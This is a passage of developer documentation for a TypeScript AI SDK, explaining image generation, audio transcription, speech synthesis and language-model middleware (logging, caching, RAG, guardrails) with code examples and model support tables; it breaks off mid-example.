import { experimental_generateImage as generateImage } from 'ai';
import { openai } from '@ai-sdk/openai';
const { image } = await generateImage({
model: openai.image('dall-e-3'),
prompt: 'Santa Claus driving a Cadillac',
size: '1024x1024',
});
Aspect Ratio
The aspect ratio is specified as a string in the format {width}:{height}.
Models only support a few aspect ratios, and the supported aspect ratios are different for each model and provider.
import { experimental_generateImage as generateImage } from 'ai';
import { vertex } from '@ai-sdk/google-vertex';
const { image } = await generateImage({
model: vertex.image('imagen-4.0-generate-001'),
prompt: 'Santa Claus driving a Cadillac',
aspectRatio: '16:9',
});
Generating Multiple Images
generateImage also supports generating multiple images at once:
import { experimental_generateImage as generateImage } from 'ai';
import { openai } from '@ai-sdk/openai';
const { images } = await generateImage({
model: openai.image('dall-e-2'),
prompt: 'Santa Claus driving a Cadillac',
n: 4, // number of images to generate
});
Each image model has an internal limit on how many images it can generate in a single API call. The AI SDK manages this automatically by batching requests appropriately when you request multiple images using the n parameter. By default, the SDK uses provider-documented limits (for example, DALL-E 3 can only generate 1 image per call, while DALL-E 2 supports up to 10).
If needed, you can override this behavior using the maxImagesPerCall setting when generating your image. This is particularly useful when working with new or custom models where the default batch size might not be optimal:
const { images } = await generateImage({
model: openai.image('dall-e-2'),
prompt: 'Santa Claus driving a Cadillac',
maxImagesPerCall: 5, // Override the default batch size
n: 10, // Will make 2 calls of 5 images each
});
Providing a Seed
You can provide a seed to the generateImage function to control the output of the image generation process.
If supported by the model, the same seed will always produce the same image.
import { experimental_generateImage as generateImage } from 'ai';
import { openai } from '@ai-sdk/openai';
const { image } = await generateImage({
model: openai.image('dall-e-3'),
prompt: 'Santa Claus driving a Cadillac',
seed: 1234567890,
});
Provider-specific Settings
Image models often have provider- or even model-specific settings.
You can pass such settings to the generateImage function
using the providerOptions parameter. The options for the provider
(openai in the example below) become request body properties.
import { experimental_generateImage as generateImage } from 'ai';
import { openai } from '@ai-sdk/openai';
const { image } = await generateImage({
model: openai.image('dall-e-3'),
prompt: 'Santa Claus driving a Cadillac',
size: '1024x1024',
providerOptions: {
openai: { style: 'vivid', quality: 'hd' },
},
});
Abort Signals and Timeouts
generateImage accepts an optional abortSignal parameter of
type AbortSignal
that you can use to abort the image generation process or set a timeout.
import { openai } from '@ai-sdk/openai';
import { experimental_generateImage as generateImage } from 'ai';
const { image } = await generateImage({
model: openai.image('dall-e-3'),
prompt: 'Santa Claus driving a Cadillac',
abortSignal: AbortSignal.timeout(1000), // Abort after 1 second
});
Custom Headers
generateImage accepts an optional headers parameter of type Record<string, string>
that you can use to add custom headers to the image generation request.
import { openai } from '@ai-sdk/openai';
import { experimental_generateImage as generateImage } from 'ai';
const { image } = await generateImage({
model: openai.image('dall-e-3'),
prompt: 'Santa Claus driving a Cadillac',
headers: { 'X-Custom-Header': 'custom-value' },
});
Warnings
If the model returns warnings, e.g. for unsupported parameters, they will be available in the warnings property of the response.
const { image, warnings } = await generateImage({
model: openai.image('dall-e-3'),
prompt: 'Santa Claus driving a Cadillac',
});
Additional provider-specific metadata
Some providers expose additional metadata for the result overall or per image.
const prompt = 'Santa Claus driving a Cadillac';
const { image, providerMetadata } = await generateImage({
model: openai.image('dall-e-3'),
prompt,
});
const revisedPrompt = providerMetadata.openai.images[0]?.revisedPrompt;
console.log({
prompt,
revisedPrompt,
});
The outer key of the returned providerMetadata is the provider name. The inner values are the metadata. An images key is always present in the metadata and is an array with the same length as the top level images key.
Error Handling
When generateImage cannot generate a valid image, it throws an AI_NoImageGeneratedError.
This error occurs when the AI provider fails to generate an image. It can arise due to the following reasons:
- The model failed to generate a response
- The model generated a response that could not be parsed
The error preserves the following information to help you log the issue:
- responses: Metadata about the image model responses, including timestamp, model, and headers.
- cause: The cause of the error. You can use this for more detailed error handling.
import { experimental_generateImage as generateImage, NoImageGeneratedError } from 'ai';
try {
await generateImage({ model, prompt });
} catch (error) {
if (NoImageGeneratedError.isInstance(error)) {
console.log('NoImageGeneratedError');
console.log('Cause:', error.cause);
console.log('Responses:', error.responses);
}
}
Generating Images with Language Models
Some language models such as Google gemini-2.5-flash-image-preview support multi-modal outputs including images.
With such models, you can access the generated images using the files property of the response.
import { google } from '@ai-sdk/google';
import { generateText } from 'ai';
const result = await generateText({
model: google('gemini-2.5-flash-image-preview'),
prompt: 'Generate an image of a comic cat',
});
for (const file of result.files) {
if (file.mediaType.startsWith('image/')) {
// The file object provides multiple data formats:
// Access images as base64 string, Uint8Array binary data, or check type
// - file.base64: string (data URL format)
// - file.uint8Array: Uint8Array (binary data)
// - file.mediaType: string (e.g. "image/png")
}
}
Image Models
| Provider | Model | Supported sizes (width x height) or aspect ratios (width : height) |
|---|---|---|
| xAI Grok | grok-2-image | 1024x768 (default) |
| OpenAI | gpt-image-1 | 1024x1024, 1536x1024, 1024x1536 |
| OpenAI | dall-e-3 | 1024x1024, 1792x1024, 1024x1792 |
| OpenAI | dall-e-2 | 256x256, 512x512, 1024x1024 |
| Amazon Bedrock | amazon.nova-canvas-v1:0 | 320-4096 (multiples of 16), 1:4 to 4:1, max 4.2M pixels |
| Fal | fal-ai/flux/dev | 1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9 |
| Fal | fal-ai/flux-lora | 1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9 |
| Fal | fal-ai/fast-sdxl | 1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9 |
| Fal | fal-ai/flux-pro/v1.1-ultra | 1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9 |
| Fal | fal-ai/ideogram/v2 | 1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9 |
| Fal | fal-ai/recraft-v3 | 1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9 |
| Fal | fal-ai/stable-diffusion-3.5-large | 1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9 |
| Fal | fal-ai/hyper-sdxl | 1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9 |
| DeepInfra | stabilityai/sd3.5 | 1:1, 16:9, 1:9, 3:2, 2:3, 4:5, 5:4, 9:16, 9:21 |
| DeepInfra | black-forest-labs/FLUX-1.1-pro | 256-1440 (multiples of 32) |
| DeepInfra | black-forest-labs/FLUX-1-schnell | 256-1440 (multiples of 32) |
| DeepInfra | black-forest-labs/FLUX-1-dev | 256-1440 (multiples of 32) |
| DeepInfra | black-forest-labs/FLUX-pro | 256-1440 (multiples of 32) |
| DeepInfra | stabilityai/sd3.5-medium | 1:1, 16:9, 1:9, 3:2, 2:3, 4:5, 5:4, 9:16, 9:21 |
| DeepInfra | stabilityai/sdxl-turbo | 1:1, 16:9, 1:9, 3:2, 2:3, 4:5, 5:4, 9:16, 9:21 |
| Replicate | black-forest-labs/flux-schnell | 1:1, 2:3, 3:2, 4:5, 5:4, 16:9, 9:16, 9:21, 21:9 |
| Replicate | recraft-ai/recraft-v3 | 1024x1024, 1365x1024, 1024x1365, 1536x1024, 1024x1536, 1820x1024, 1024x1820, 1024x2048, 2048x1024, 1434x1024, 1024x1434, 1024x1280, 1280x1024, 1024x1707, 1707x1024 |
| Google Generative AI | imagen-4.0-generate-001 | 1:1, 3:4, 4:3, 9:16, 16:9 |
| Google Generative AI | imagen-4.0-fast-generate-001 | 1:1, 3:4, 4:3, 9:16, 16:9 |
| Google Generative AI | imagen-4.0-ultra-generate-001 | 1:1, 3:4, 4:3, 9:16, 16:9 |
| Google Vertex | imagen-4.0-generate-001 | 1:1, 3:4, 4:3, 9:16, 16:9 |
| Google Vertex | imagen-4.0-fast-generate-001 | 1:1, 3:4, 4:3, 9:16, 16:9 |
| Google Vertex | imagen-4.0-ultra-generate-001 | 1:1, 3:4, 4:3, 9:16, 16:9 |
| Google Vertex | imagen-3.0-fast-generate-001 | 1:1, 3:4, 4:3, 9:16, 16:9 |
| Fireworks | accounts/fireworks/models/flux-1-dev-fp8 | 1:1, 2:3, 3:2, 4:5, 5:4, 16:9, 9:16, 9:21, 21:9 |
| Fireworks | accounts/fireworks/models/flux-1-schnell-fp8 | 1:1, 2:3, 3:2, 4:5, 5:4, 16:9, 9:16, 9:21, 21:9 |
| Fireworks | accounts/fireworks/models/playground-v2-5-1024px-aesthetic | 640x1536, 768x1344, 832x1216, 896x1152, 1024x1024, 1152x896, 1216x832, 1344x768, 1536x640 |
| Fireworks | accounts/fireworks/models/japanese-stable-diffusion-xl | 640x1536, 768x1344, 832x1216, 896x1152, 1024x1024, 1152x896, 1216x832, 1344x768, 1536x640 |
| Fireworks | accounts/fireworks/models/playground-v2-1024px-aesthetic | 640x1536, 768x1344, 832x1216, 896x1152, 1024x1024, 1152x896, 1216x832, 1344x768, 1536x640 |
| Fireworks | accounts/fireworks/models/SSD-1B | 640x1536, 768x1344, 832x1216, 896x1152, 1024x1024, 1152x896, 1216x832, 1344x768, 1536x640 |
| Fireworks | accounts/fireworks/models/stable-diffusion-xl-1024-v1-0 | 640x1536, 768x1344, 832x1216, 896x1152, 1024x1024, 1152x896, 1216x832, 1344x768, 1536x640 |
| Luma | photon-1 | 1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9 |
| Luma | photon-flash-1 | 1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9 |
| Together.ai | stabilityai/stable-diffusion-xl-base-1.0 | 512x512, 768x768, 1024x1024 |
| Together.ai | black-forest-labs/FLUX.1-dev | 512x512, 768x768, 1024x1024 |
| Together.ai | black-forest-labs/FLUX.1-dev-lora | 512x512, 768x768, 1024x1024 |
| Together.ai | black-forest-labs/FLUX.1-schnell | 512x512, 768x768, 1024x1024 |
| Together.ai | black-forest-labs/FLUX.1-canny | 512x512, 768x768, 1024x1024 |
| Together.ai | black-forest-labs/FLUX.1-depth | 512x512, 768x768, 1024x1024 |
| Together.ai | black-forest-labs/FLUX.1-redux | 512x512, 768x768, 1024x1024 |
| Together.ai | black-forest-labs/FLUX.1.1-pro | 512x512, 768x768, 1024x1024 |
| Together.ai | black-forest-labs/FLUX.1-pro | 512x512, 768x768, 1024x1024 |
| Together.ai | black-forest-labs/FLUX.1-schnell-Free | 512x512, 768x768, 1024x1024 |
| Black Forest Labs | flux-kontext-pro | From 3:7 (portrait) to 7:3 (landscape) |
| Black Forest Labs | flux-kontext-max | From 3:7 (portrait) to 7:3 (landscape) |
| Black Forest Labs | flux-pro-1.1-ultra | From 3:7 (portrait) to 7:3 (landscape) |
| Black Forest Labs | flux-pro-1.1 | From 3:7 (portrait) to 7:3 (landscape) |
| Black Forest Labs | flux-pro-1.0-fill | From 3:7 (portrait) to 7:3 (landscape) |
Above are a small subset of the image models supported by the AI SDK providers. For more, see the respective provider documentation.
title: Transcription description: Learn how to transcribe audio with the AI SDK.
Transcription
Transcription is an experimental feature.
The AI SDK provides the transcribe
function to transcribe audio using a transcription model.
import { experimental_transcribe as transcribe } from 'ai';
import { openai } from '@ai-sdk/openai';
import { readFile } from 'fs/promises';
const transcript = await transcribe({
model: openai.transcription('whisper-1'),
audio: await readFile('audio.mp3'),
});
The audio property can be a Uint8Array, ArrayBuffer, Buffer, string (base64 encoded audio data), or a URL.
To access the generated transcript:
const text = transcript.text; // transcript text e.g. "Hello, world!"
const segments = transcript.segments; // array of segments with start and end times, if available
const language = transcript.language; // language of the transcript e.g. "en", if available
const durationInSeconds = transcript.durationInSeconds; // duration of the transcript in seconds, if available
Settings
Provider-Specific settings
Transcription models often have provider or model-specific settings which you can set using the providerOptions parameter.
import { experimental_transcribe as transcribe } from 'ai';
import { openai } from '@ai-sdk/openai';
import { readFile } from 'fs/promises';
const transcript = await transcribe({
model: openai.transcription('whisper-1'),
audio: await readFile('audio.mp3'),
providerOptions: {
openai: {
timestampGranularities: ['word'],
},
},
});
Download Size Limits
When audio is a URL, the SDK downloads the file with a default 2 GiB size limit.
You can customize this using createDownload:
import { experimental_transcribe as transcribe, createDownload } from 'ai';
import { openai } from '@ai-sdk/openai';
const transcript = await transcribe({
model: openai.transcription('whisper-1'),
audio: new URL('https://example.com/audio.mp3'),
download: createDownload({ maxBytes: 50 * 1024 * 1024 }), // 50 MB limit
});
You can also provide a fully custom download function:
import { experimental_transcribe as transcribe } from 'ai';
import { openai } from '@ai-sdk/openai';
const transcript = await transcribe({
model: openai.transcription('whisper-1'),
audio: new URL('https://example.com/audio.mp3'),
download: async ({ url }) => {
const res = await myAuthenticatedFetch(url);
return {
data: new Uint8Array(await res.arrayBuffer()),
mediaType: res.headers.get('content-type') ?? undefined,
};
},
});
If a download exceeds the size limit, a DownloadError is thrown:
import { experimental_transcribe as transcribe, DownloadError } from 'ai';
import { openai } from '@ai-sdk/openai';
try {
await transcribe({
model: openai.transcription('whisper-1'),
audio: new URL('https://example.com/audio.mp3'),
});
} catch (error) {
if (DownloadError.isInstance(error)) {
console.log('Download failed:', error.message);
}
}
Abort Signals and Timeouts
transcribe accepts an optional abortSignal parameter of
type AbortSignal
that you can use to abort the transcription process or set a timeout.
This is particularly useful when combined with URL downloads to prevent long-running requests:
import { openai } from '@ai-sdk/openai';
import { experimental_transcribe as transcribe } from 'ai';
const transcript = await transcribe({
model: openai.transcription('whisper-1'),
audio: new URL('https://example.com/audio.mp3'),
abortSignal: AbortSignal.timeout(5000), // Abort after 5 seconds
});
Custom Headers
transcribe accepts an optional headers parameter of type Record<string, string>
that you can use to add custom headers to the transcription request.
import { openai } from '@ai-sdk/openai';
import { experimental_transcribe as transcribe } from 'ai';
import { readFile } from 'fs/promises';
const transcript = await transcribe({
model: openai.transcription('whisper-1'),
audio: await readFile('audio.mp3'),
headers: { 'X-Custom-Header': 'custom-value' },
});
Warnings
Warnings (e.g. unsupported parameters) are available on the warnings property.
import { openai } from '@ai-sdk/openai';
import { experimental_transcribe as transcribe } from 'ai';
import { readFile } from 'fs/promises';
const transcript = await transcribe({
model: openai.transcription('whisper-1'),
audio: await readFile('audio.mp3'),
});
const warnings = transcript.warnings;
Error Handling
When transcribe cannot generate a valid transcript, it throws an AI_NoTranscriptGeneratedError.
This error can arise for any of the following reasons:
- The model failed to generate a response
- The model generated a response that could not be parsed
The error preserves the following information to help you log the issue:
- responses: Metadata about the transcription model responses, including timestamp, model, and headers.
- cause: The cause of the error. You can use this for more detailed error handling.
import {
experimental_transcribe as transcribe,
NoTranscriptGeneratedError,
} from 'ai';
import { openai } from '@ai-sdk/openai';
import { readFile } from 'fs/promises';
try {
await transcribe({
model: openai.transcription('whisper-1'),
audio: await readFile('audio.mp3'),
});
} catch (error) {
if (NoTranscriptGeneratedError.isInstance(error)) {
console.log('NoTranscriptGeneratedError');
console.log('Cause:', error.cause);
console.log('Responses:', error.responses);
}
}
Transcription Models
| Provider | Model |
|---|---|
| OpenAI | whisper-1 |
| OpenAI | gpt-4o-transcribe |
| OpenAI | gpt-4o-mini-transcribe |
| ElevenLabs | scribe_v1 |
| ElevenLabs | scribe_v1_experimental |
| Groq | whisper-large-v3-turbo |
| Groq | distil-whisper-large-v3-en |
| Groq | whisper-large-v3 |
| Azure OpenAI | whisper-1 |
| Azure OpenAI | gpt-4o-transcribe |
| Azure OpenAI | gpt-4o-mini-transcribe |
| Rev.ai | machine |
| Rev.ai | low_cost |
| Rev.ai | fusion |
| Deepgram | base (+ variants) |
| Deepgram | enhanced (+ variants) |
| Deepgram | nova (+ variants) |
| Deepgram | nova-2 (+ variants) |
| Deepgram | nova-3 (+ variants) |
| Gladia | default |
| AssemblyAI | best |
| AssemblyAI | nano |
| Fal | whisper |
| Fal | wizper |
Above are a small subset of the transcription models supported by the AI SDK providers. For more, see the respective provider documentation.
title: Speech description: Learn how to generate speech from text with the AI SDK.
Speech
Speech is an experimental feature.
The AI SDK provides the generateSpeech
function to generate speech from text using a speech model.
import { experimental_generateSpeech as generateSpeech } from 'ai';
import { openai } from '@ai-sdk/openai';
const audio = await generateSpeech({
model: openai.speech('tts-1'),
text: 'Hello, world!',
voice: 'alloy',
});
Language Setting
You can specify the language for speech generation (provider support varies):
import { experimental_generateSpeech as generateSpeech } from 'ai';
import { lmnt } from '@ai-sdk/lmnt';
const audio = await generateSpeech({
model: lmnt.speech('aurora'),
text: 'Hola, mundo!',
language: 'es', // Spanish
});
To access the generated audio:
const audioData = audio.audioData; // audio data, e.g. Uint8Array
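For example, you can write the audio data to a file (a minimal sketch, assuming the data is a Uint8Array as noted above):
import { writeFile } from 'node:fs/promises';
await writeFile('speech.mp3', audioData);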
Settings
Provider-Specific settings
You can set model-specific settings with the providerOptions parameter.
import { experimental_generateSpeech as generateSpeech } from 'ai';
import { openai } from '@ai-sdk/openai';
const audio = await generateSpeech({
model: openai.speech('tts-1'),
text: 'Hello, world!',
providerOptions: {
openai: {
// ...
},
},
});
Abort Signals and Timeouts
generateSpeech accepts an optional abortSignal parameter of
type AbortSignal
that you can use to abort the speech generation process or set a timeout.
import { openai } from '@ai-sdk/openai';
import { experimental_generateSpeech as generateSpeech } from 'ai';
const audio = await generateSpeech({
model: openai.speech('tts-1'),
text: 'Hello, world!',
abortSignal: AbortSignal.timeout(1000), // Abort after 1 second
});
Custom Headers
generateSpeech accepts an optional headers parameter of type Record<string, string>
that you can use to add custom headers to the speech generation request.
import { openai } from '@ai-sdk/openai';
import { experimental_generateSpeech as generateSpeech } from 'ai';
const audio = await generateSpeech({
model: openai.speech('tts-1'),
text: 'Hello, world!',
headers: { 'X-Custom-Header': 'custom-value' },
});
Warnings
Warnings (e.g. unsupported parameters) are available on the warnings property.
import { openai } from '@ai-sdk/openai';
import { experimental_generateSpeech as generateSpeech } from 'ai';
const audio = await generateSpeech({
model: openai.speech('tts-1'),
text: 'Hello, world!',
});
const warnings = audio.warnings;
Error Handling
When generateSpeech cannot generate valid audio, it throws an AI_NoSpeechGeneratedError.
This error can arise for any of the following reasons:
- The model failed to generate a response
- The model generated a response that could not be parsed
The error preserves the following information to help you log the issue:
- responses: Metadata about the speech model responses, including timestamp, model, and headers.
- cause: The cause of the error. You can use this for more detailed error handling.
import {
experimental_generateSpeech as generateSpeech,
NoSpeechGeneratedError,
} from 'ai';
import { openai } from '@ai-sdk/openai';
try {
await generateSpeech({
model: openai.speech('tts-1'),
text: 'Hello, world!',
});
} catch (error) {
if (NoSpeechGeneratedError.isInstance(error)) {
console.log('NoSpeechGeneratedError');
console.log('Cause:', error.cause);
console.log('Responses:', error.responses);
}
}
Speech Models
| Provider | Model |
|---|---|
| OpenAI | tts-1 |
| OpenAI | tts-1-hd |
| OpenAI | gpt-4o-mini-tts |
| ElevenLabs | eleven_v3 |
| ElevenLabs | eleven_multilingual_v2 |
| ElevenLabs | eleven_flash_v2_5 |
| ElevenLabs | eleven_flash_v2 |
| ElevenLabs | eleven_turbo_v2_5 |
| ElevenLabs | eleven_turbo_v2 |
| LMNT | aurora |
| LMNT | blizzard |
| Hume | default |
Above are a small subset of the speech models supported by the AI SDK providers. For more, see the respective provider documentation.
title: Language Model Middleware description: Learn how to use middleware to enhance the behavior of language models
Language Model Middleware
Language model middleware is a way to enhance the behavior of language models by intercepting and modifying the calls to the language model.
It can be used to add features like guardrails, RAG, caching, and logging in a language model agnostic way. Such middleware can be developed and distributed independently from the language models that they are applied to.
Using Language Model Middleware
You can use language model middleware with the wrapLanguageModel function.
It takes a language model and a language model middleware and returns a new
language model that incorporates the middleware.
import { wrapLanguageModel } from 'ai';
const wrappedLanguageModel = wrapLanguageModel({
model: yourModel,
middleware: yourLanguageModelMiddleware,
});
The wrapped language model can be used just like any other language model, e.g. in streamText:
const result = streamText({
model: wrappedLanguageModel,
prompt: 'What cities are in the United States?',
});
Multiple middlewares
You can provide multiple middlewares to the wrapLanguageModel function.
The middlewares will be applied in the order they are provided.
const wrappedLanguageModel = wrapLanguageModel({
model: yourModel,
middleware: [firstMiddleware, secondMiddleware],
});
// applied as: firstMiddleware(secondMiddleware(yourModel))
Built-in Middleware
The AI SDK comes with several built-in middlewares that you can use to configure language models:
- extractReasoningMiddleware: Extracts reasoning information from the generated text and exposes it as a reasoning property on the result.
- simulateStreamingMiddleware: Simulates streaming behavior with responses from non-streaming language models.
- defaultSettingsMiddleware: Applies default settings to a language model.
Extract Reasoning
Some providers and models expose reasoning information in the generated text using special tags, e.g. <think> and </think>.
The extractReasoningMiddleware function can be used to extract this reasoning information and expose it as a reasoning property on the result.
import { wrapLanguageModel, extractReasoningMiddleware } from 'ai';
const model = wrapLanguageModel({
model: yourModel,
middleware: extractReasoningMiddleware({ tagName: 'think' }),
});
You can then use that enhanced model in functions like generateText and streamText.
The extractReasoningMiddleware function also includes a startWithReasoning option.
When set to true, the reasoning tag will be prepended to the generated text.
This is useful for models that do not include the reasoning tag at the beginning of the response.
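A minimal sketch enabling the option:
import { wrapLanguageModel, extractReasoningMiddleware } from 'ai';
const model = wrapLanguageModel({
model: yourModel,
middleware: extractReasoningMiddleware({
tagName: 'think',
startWithReasoning: true, // treat the response as starting inside the reasoning tag
}),
});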
For more details, see the DeepSeek R1 guide.
Simulate Streaming
The simulateStreamingMiddleware function can be used to simulate streaming behavior with responses from non-streaming language models.
This is useful when you want to maintain a consistent streaming interface even when using models that only provide complete responses.
import { wrapLanguageModel, simulateStreamingMiddleware } from 'ai';
const model = wrapLanguageModel({
model: yourModel,
middleware: simulateStreamingMiddleware(),
});
Default Settings
The defaultSettingsMiddleware function can be used to apply default settings to a language model.
import { wrapLanguageModel, defaultSettingsMiddleware } from 'ai';
const model = wrapLanguageModel({
model: yourModel,
middleware: defaultSettingsMiddleware({
settings: {
temperature: 0.5,
maxOutputTokens: 800,
providerOptions: { openai: { store: false } },
},
}),
});
Community Middleware
The AI SDK provides a Language Model Middleware specification. Community members can develop middleware that adheres to this specification, making it compatible with the AI SDK ecosystem.
Here are some community middlewares that you can explore:
Custom tool call parser
The Custom tool call parser middleware extends tool call capabilities to models that don't natively support the OpenAI-style tools parameter. This includes many self-hosted and third-party models that lack native function calling features.
This middleware enables function calling capabilities by converting function schemas into prompt instructions and parsing the model's responses into structured function calls. It works by transforming the JSON function definitions into natural language instructions the model can understand, then analyzing the generated text to extract function call attempts. This approach allows developers to use the same function calling API across different model providers, even with models that don't natively support the OpenAI-style function calling format, providing a consistent function calling experience regardless of the underlying model implementation.
The @ai-sdk-tool/parser package offers three middleware variants:
- `createToolMiddleware`: A flexible function for creating custom tool call middleware tailored to specific models
- `hermesToolMiddleware`: Ready-to-use middleware for Hermes & Qwen format function calls
- `gemmaToolMiddleware`: Pre-configured middleware for the Gemma 3 model series function call format
Here's how you can enable function calls with Gemma models that don't support them natively:
import { wrapLanguageModel } from 'ai';
import { gemmaToolMiddleware } from '@ai-sdk-tool/parser';
const model = wrapLanguageModel({
model: openrouter('google/gemma-3-27b-it'),
middleware: gemmaToolMiddleware,
});
Find more examples at this link.
Implementing Language Model Middleware
You can implement any of the following three functions to modify the behavior of the language model:
- `transformParams`: Transforms the parameters before they are passed to the language model, for both `doGenerate` and `doStream`.
- `wrapGenerate`: Wraps the `doGenerate` method of the language model. You can modify the parameters, call the language model, and modify the result.
- `wrapStream`: Wraps the `doStream` method of the language model. You can modify the parameters, call the language model, and modify the result.
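Each of these is optional; a middleware is just a plain object. A minimal no-op sketch that shows the shape of all three functions:
import type { LanguageModelV2Middleware } from '@ai-sdk/provider';
export const noopMiddleware: LanguageModelV2Middleware = {
  // pass parameters through unchanged
  transformParams: async ({ params }) => params,
  // call the model and return its result as-is
  wrapGenerate: async ({ doGenerate }) => doGenerate(),
  // call the model and return its stream as-is
  wrapStream: async ({ doStream }) => doStream(),
};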
Here are some examples of how to implement language model middleware:
Examples
Logging
This example shows how to log the parameters and generated text of a language model call.
import type {
LanguageModelV2Middleware,
LanguageModelV2StreamPart,
} from '@ai-sdk/provider';
export const yourLogMiddleware: LanguageModelV2Middleware = {
wrapGenerate: async ({ doGenerate, params }) => {
console.log('doGenerate called');
console.log(`params: ${JSON.stringify(params, null, 2)}`);
const result = await doGenerate();
console.log('doGenerate finished');
console.log(`generated text: ${result.text}`);
return result;
},
wrapStream: async ({ doStream, params }) => {
console.log('doStream called');
console.log(`params: ${JSON.stringify(params, null, 2)}`);
const { stream, ...rest } = await doStream();
let generatedText = '';
const textBlocks = new Map<string, string>();
const transformStream = new TransformStream<
LanguageModelV2StreamPart,
LanguageModelV2StreamPart
>({
transform(chunk, controller) {
switch (chunk.type) {
case 'text-start': {
textBlocks.set(chunk.id, '');
break;
}
case 'text-delta': {
const existing = textBlocks.get(chunk.id) || '';
textBlocks.set(chunk.id, existing + chunk.delta);
generatedText += chunk.delta;
break;
}
case 'text-end': {
console.log(
`Text block ${chunk.id} completed:`,
textBlocks.get(chunk.id),
);
break;
}
}
controller.enqueue(chunk);
},
flush() {
console.log('doStream finished');
console.log(`generated text: ${generatedText}`);
},
});
return {
stream: stream.pipeThrough(transformStream),
...rest,
};
},
};
Caching
This example shows how to build a simple cache for the generated text of a language model call.
import type { LanguageModelV2Middleware } from '@ai-sdk/provider';
const cache = new Map<string, any>();
export const yourCacheMiddleware: LanguageModelV2Middleware = {
wrapGenerate: async ({ doGenerate, params }) => {
const cacheKey = JSON.stringify(params);
if (cache.has(cacheKey)) {
return cache.get(cacheKey);
}
const result = await doGenerate();
cache.set(cacheKey, result);
return result;
},
// here you would implement the caching logic for streaming
};
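For streaming, one possible approach (a sketch, not a complete implementation) is to record the stream parts on a cache miss and replay them with `simulateReadableStream` on a hit:
import { simulateReadableStream } from 'ai';
import type {
  LanguageModelV2Middleware,
  LanguageModelV2StreamPart,
} from '@ai-sdk/provider';
const streamCache = new Map<string, LanguageModelV2StreamPart[]>();
export const yourStreamCacheMiddleware: LanguageModelV2Middleware = {
  wrapStream: async ({ doStream, params }) => {
    const cacheKey = JSON.stringify(params);
    // cache hit: replay the recorded stream parts
    const cached = streamCache.get(cacheKey);
    if (cached != null) {
      return { stream: simulateReadableStream({ chunks: cached }) };
    }
    // cache miss: forward the stream while recording its parts
    const { stream, ...rest } = await doStream();
    const recordedParts: LanguageModelV2StreamPart[] = [];
    const recordingStream = new TransformStream<
      LanguageModelV2StreamPart,
      LanguageModelV2StreamPart
    >({
      transform(chunk, controller) {
        recordedParts.push(chunk);
        controller.enqueue(chunk);
      },
      flush() {
        streamCache.set(cacheKey, recordedParts);
      },
    });
    return { stream: stream.pipeThrough(recordingStream), ...rest };
  },
};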
Retrieval Augmented Generation (RAG)
This example shows how to use RAG as middleware.
import type { LanguageModelV2Middleware } from '@ai-sdk/provider';
export const yourRagMiddleware: LanguageModelV2Middleware = {
transformParams: async ({ params }) => {
const lastUserMessageText = getLastUserMessageText({
prompt: params.prompt,
});
if (lastUserMessageText == null) {
return params; // do not use RAG (send unmodified parameters)
}
const instruction =
'Use the following information to answer the question:\n' +
findSources({ text: lastUserMessageText })
.map(chunk => JSON.stringify(chunk))
.join('\n');
return addToLastUserMessage({ params, text: instruction });
},
};
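The helpers used above (`getLastUserMessageText`, `findSources`, `addToLastUserMessage`) are not part of the AI SDK; `findSources` would query your own data store. A minimal sketch of the two message helpers, assuming the `LanguageModelV2` prompt shape:
import type {
  LanguageModelV2CallOptions,
  LanguageModelV2Prompt,
} from '@ai-sdk/provider';
// Return the concatenated text parts of the last user message, if any.
function getLastUserMessageText({
  prompt,
}: {
  prompt: LanguageModelV2Prompt;
}): string | undefined {
  const lastMessage = prompt.at(-1);
  if (lastMessage?.role !== 'user') return undefined;
  return lastMessage.content
    .flatMap(part => (part.type === 'text' ? [part.text] : []))
    .join('');
}
// Append text to the last user message, leaving all other params unchanged.
function addToLastUserMessage({
  params,
  text,
}: {
  params: LanguageModelV2CallOptions;
  text: string;
}): LanguageModelV2CallOptions {
  const lastMessage = params.prompt.at(-1);
  if (lastMessage?.role !== 'user') return params;
  return {
    ...params,
    prompt: [
      ...params.prompt.slice(0, -1),
      {
        ...lastMessage,
        content: [...lastMessage.content, { type: 'text', text }],
      },
    ],
  };
}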
Guardrails
Guardrails are a way to ensure that the generated text of a language model call is safe and appropriate. This example shows how to use guardrails as middleware.
import type { LanguageModelV2Middleware } from '@ai-sdk/provider';
export const yourGuardrailMiddleware: LanguageModelV2Middleware = {
wrapGenerate: async ({ doGenerate }) => {
const { text, ...rest } = await doGenerate();
// filtering approach, e.g. for PII or other sensitive information:
const cleanedText = text?.replace(/badword/g, '<REDACTED>');
return { text: cleanedText, ...rest };
},
// here you would implement the guardrail logic for streaming
// Note: streaming guardrails are difficult to implement, because
// you do not know the full content of the stream until it's finished.
};
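For streaming, a best-effort sketch is to redact each text delta as it passes through; note that matches split across chunk boundaries slip through, which is why buffering is usually needed in practice:
import type {
  LanguageModelV2Middleware,
  LanguageModelV2StreamPart,
} from '@ai-sdk/provider';
export const yourStreamingGuardrailMiddleware: LanguageModelV2Middleware = {
  wrapStream: async ({ doStream }) => {
    const { stream, ...rest } = await doStream();
    const redactingStream = new TransformStream<
      LanguageModelV2StreamPart,
      LanguageModelV2StreamPart
    >({
      transform(chunk, controller) {
        if (chunk.type === 'text-delta') {
          // naive per-chunk redaction; misses matches that span chunks
          controller.enqueue({
            ...chunk,
            delta: chunk.delta.replace(/badword/g, '<REDACTED>'),
          });
        } else {
          controller.enqueue(chunk);
        }
      },
    });
    return { stream: stream.pipeThrough(redactingStream), ...rest };
  },
};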
Configuring Per Request Custom Metadata
To send and access custom metadata in Middleware, you can use providerOptions. This is useful when building logging middleware where you want to pass additional context like user IDs, timestamps, or other contextual data that can help with tracking and debugging.
import { generateText, wrapLanguageModel } from 'ai';
__PROVIDER_IMPORT__;
import type { LanguageModelV2Middleware } from '@ai-sdk/provider';
export const yourLogMiddleware: LanguageModelV2Middleware = {
wrapGenerate: async ({ doGenerate, params }) => {
console.log('METADATA', params?.providerMetadata?.yourLogMiddleware);
const result = await doGenerate();
return result;
},
};
const { text } = await generateText({
model: wrapLanguageModel({
model: __MODEL__,
